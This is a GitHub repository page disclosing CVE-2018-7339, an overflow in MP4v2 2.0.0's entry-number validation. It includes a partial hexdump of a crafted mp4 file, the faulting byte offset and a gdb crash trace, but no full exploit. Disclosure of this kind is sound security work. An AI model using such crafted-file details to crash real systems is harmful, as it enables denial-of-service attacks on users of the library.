Skip to content

pingsuewim/libmp4_bof

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

libmp4_bof

CVE Reference : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7339

The MP4Atom class in mp4atom.cpp in MP4v2 through 2.0.0 mishandles Entry Number validation for the MP4 Table Property, which allows remote attackers to cause a denial of service (overflow, insufficient memory allocation, and segmentation fault) or possibly have unspecified other impact via a crafted mp4 file.

MP4v2 through 2.0.0

Mp4 Table Property that checks Entry number has a vulnerability with opening a maliciously craft mp4 file. It causes Memory crash and Denial-Of-Service.

root@ubuntu:/home/wim# hexdump -C wim.mp4 | grep 63

00000020 de 36 00 00 6c 69 62 66 61 61 63 20 31 2e 32 36 |.6..libfaac 1.26|

00000330 3e ff af f3 c7 0b ba b2 a5 51 2a b2 63 43 ed ba |>........Q*.cC..|

00000500 ac 08 90 50 56 14 81 5c 70 aa 05 ef 34 1a a4 63 |...PV..\p...4..c|

00000510 a8 63 26 5d 78 02 04 08 08 01 6a a7 72 00 85 50 |.c&]x.....j.r..P|

00000630 cb 58 02 6a 02 02 80 2e 00 00 04 c0 12 01 70 00 |.X.j..........p.|

00000880 9f ce 33 e1 f6 03 b3 e6 63 fd be d7 25 3f 38 d9 |..3.....c...%?8.|

00000bd0 00 00 00 99 00 00 00 28 73 74 73 63 00 00 00 00 |.......(stsc....|

00000c00 73 74 63 6f 00 00 00 00 00 00 00 03 00 00 00 20 |stco........... |

00000c10 00 00 04 ab 00 00 08 df 00 00 00 20 63 74 74 73 |........... ctts|

insufficient checking on Entry Number in MP4 Table Property- m_pProperties[i] 0xC1C ~ 0xC1F in /src/mp4atom.cpp

When overflow occurs, small size of data is allocated and while reading data, crash occurs due to a memory reference error

gdb-peda$ r ../wim.mp4 Starting program: /home/wim/.libs/lt-mp4info ../wim.mp4 /home/wim/.libs/lt-mp4info version 2.0.0 ../wim.mp4:

Program received signal SIGSEGV, Segmentation fault.

registers

EAX: 0x80695c0 --> 0x0

EBX: 0xb7fd5000 --> 0x171e40

ECX: 0x0

EDX: 0x0

ESI: 0x8069510 --> 0xb7fd4108 --> 0xb7f0af50 (mp4v2::impl::MP4Atom::~MP4Atom(): push edi)

EBP: 0x8069510 --> 0xb7fd4108 --> 0xb7f0af50 (mp4v2::impl::MP4Atom::~MP4Atom(): push edi)

ESP: 0xbfffe890 --> 0x80695c0 --> 0x0

EIP: 0xb7f0af85 (mp4v2::impl::MP4Atom::~MP4Atom()+53: call DWORD PTR [edx+0x4])

EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)

code

0xb7f0af7e <mp4v2::impl::MP4Atom::~MP4Atom()+46>: xchg   ax,ax

0xb7f0af80 <mp4v2::impl::MP4Atom::~MP4Atom()+48>: mov    edx,DWORD PTR [eax]

0xb7f0af82 <mp4v2::impl::MP4Atom::~MP4Atom()+50>: mov    DWORD PTR [esp],eax

=> 0xb7f0af85 mp4v2::impl::MP4Atom::~MP4Atom()+53: call DWORD PTR [edx+0x4]

0xb7f0af88 <mp4v2::impl::MP4Atom::~MP4Atom()+56>: cmp    DWORD PTR [esi+0x44],edi

0xb7f0af8b <mp4v2::impl::MP4Atom::~MP4Atom()+59>: jbe    0xb7f0afa0 <mp4v2::impl::MP4Atom::~MP4Atom()+80>

0xb7f0af8d <mp4v2::impl::MP4Atom::~MP4Atom()+61>: mov    edx,DWORD PTR [esi+0x4c]

0xb7f0af90 <mp4v2::impl::MP4Atom::~MP4Atom()+64>: add    edi,0x1

Guessed arguments: arg[0]: 0x80695c0 --> 0x0

stack

0000| 0xbfffe890 --> 0x80695c0 --> 0x0

0004| 0xbfffe894 --> 0xb7d736bc --> 0xf9

0008| 0xbfffe898 --> 0xffffffff

0012| 0xbfffe89c --> 0xb7fd5000 --> 0x171e40

0016| 0xbfffe8a0 --> 0xb7fd5000 --> 0x171e40

0020| 0xbfffe8a4 --> 0x8069510 --> 0xb7fd4108 --> 0xb7f0af50 (mp4v2::impl::MP4Atom::~MP4Atom(): push edi)

0024| 0xbfffe8a8 ("sttc\264W\354\267\020\225\006\b")

0028| 0xbfffe8ac --> 0xb7ec57b4 (mp4v2::impl::MP4StandardAtom::~MP4StandardAtom()+36: mov DWORD PTR [esp],esi)

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0xb7f0af85 in mp4v2::impl::MP4Atom::~MP4Atom (this=0x8069510, __in_chrg=) at src/mp4atom.cpp:66

66 delete m_pProperties[i];

mp4v2-2.0.0(https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/mp4v2/mp4v2-2.0.0.tar.bz2) - v2-2.0.0

i

About

Mp4 Table Property that checks Entry number has a vulnerability with opening a maliciously craft mp4 file. It causes Memory crash and Denial-Of-Service.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published